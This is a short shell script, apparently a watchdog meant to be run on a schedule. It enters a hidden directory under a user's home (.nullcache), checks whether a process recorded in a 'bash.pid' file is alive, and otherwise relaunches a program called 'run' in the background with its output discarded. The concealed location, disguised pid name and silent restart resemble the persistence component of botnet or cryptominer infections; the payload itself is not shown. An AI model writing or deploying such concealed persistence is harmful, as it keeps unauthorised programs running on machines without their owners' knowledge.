#!/bin/sh
cd /home/william/.nullcache/a
if test -r /home/william/.nullcache/a/bash.pid; then
pid=$(cat /home/william/.nullcache/a/bash.pid)
if $(kill -CHLD $pid >/dev/null 2>&1)
then
exit 0
fi
fi
./run &>/dev/null
